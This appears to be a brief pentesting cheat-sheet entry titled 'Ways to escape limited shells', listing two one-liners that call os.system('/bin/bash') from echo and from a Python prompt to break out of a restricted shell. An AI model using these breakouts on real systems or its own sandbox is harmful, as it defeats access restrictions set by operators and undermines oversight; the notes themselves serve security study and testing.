Ways to escape limited shells.
Last updated 3 years ago
$ echo os.system('/bin/bash')
python >>import os; >>os.system("/bin/bash");